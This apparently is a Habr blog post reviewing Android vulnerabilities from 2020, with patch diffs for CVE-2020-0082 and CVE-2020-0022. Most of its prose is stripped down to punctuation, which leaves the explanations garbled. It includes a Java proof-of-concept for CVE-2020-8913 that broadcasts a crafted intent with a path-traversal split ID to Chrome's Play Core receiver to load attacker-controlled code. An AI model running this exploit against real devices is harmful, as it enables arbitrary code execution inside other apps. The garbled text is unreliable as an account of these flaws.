Android 2020 vulnerabilities

Hello, Habr. We are sharing with you a useful article by Alexander Kolesnikov.






Android . , , , . , , ? ? CWE TOP 25? Android ? Android 2020 .





Android

, . Android.





. 2 :





  1. ;





  2. Android , open source .





, , , 1 . . , . .





CVE-2020-0082

Android 10. CWE Top 25, CWE-502. , . , . , , -, . .





Android . system_server.





diff --git a/core/java/android/os/ExternalVibration.java b/core/java/android/os/ExternalVibration.java
index 37ca868..041d21f 100644
--- a/core/java/android/os/ExternalVibration.java
+++ b/core/java/android/os/ExternalVibration.java
@@ -157,7 +157,6 @@
         out.writeInt(mUid);
         out.writeString(mPkg);
         writeAudioAttributes(mAttrs, out, flags);
-        out.writeParcelable(mAttrs, flags);
         out.writeStrongBinder(mController.asBinder());
         out.writeStrongBinder(mToken);
     }
      
      



Parsel "android.accounts.IAccountAuthenticatorResponse



".





CVE-2020-8913

Android Play ore . receiver . , Parcel. Google Chrome:





//   ,     
public static final String APP = "com.android.chrome";

protected void onCreate(Bundle savedInstanceState) {
    super.onCreate(savedInstanceState);
//  
    Intent launchIntent = getPackageManager().getLaunchIntentForPackage(APP);
    startActivity(launchIntent);
//   Intent     
    new Handler().postDelayed(() -> {
        Intent split = new Intent();
        split.setData(Uri.parse("file://" + getApplicationInfo().sourceDir));
        split.putExtra("split_id", "../verified-splits/config.test");
//  ]
        Bundle bundle = new Bundle();
        bundle.putInt("status", 3);
        bundle.putParcelableArrayList("split_file_intents", new ArrayList<Parcelable>(Arrays.asList(split)));
//  Intent      receiver
        Intent intent = new Intent("com.google.android.play.core.splitinstall.receiver.SplitInstallUpdateIntentService");
        intent.setPackage(APP);
        intent.putExtra("session_state", bundle);
        sendBroadcast(intent);
    }, 3000);
// ,     
    new Handler().postDelayed(() -> {
        startActivity(launchIntent.putExtra("x", new EvilParcelable()));
    }, 5000);
}
      
      



CVE-2020-8899

. 100% , Android, C . Samsung.





, Android .





, , . . CWE-787.





CVE-2020-0022

BlueTooth Android 8 9. . CWE-787.





diff --git a/hci/src/packet_fragmenter.cc b/hci/src/packet_fragmenter.cc
index 5036ed5..143fc23 100644
--- a/hci/src/packet_fragmenter.cc
+++ b/hci/src/packet_fragmenter.cc
@@ -221,7 +221,8 @@
                  "%s got packet which would exceed expected length of %d. "
                  "Truncating.",
                  __func__, partial_packet->len);
-        packet->len = partial_packet->len - partial_packet->offset;
+        packet->len =
+            (partial_packet->len - partial_packet->offset) + packet->offset;
         projected_offset = partial_packet->len;
       }
      
      



. 300 33 .





, , . , .






Android- . .



- Android Developer. Basic

- Android Developer. Professional








All Articles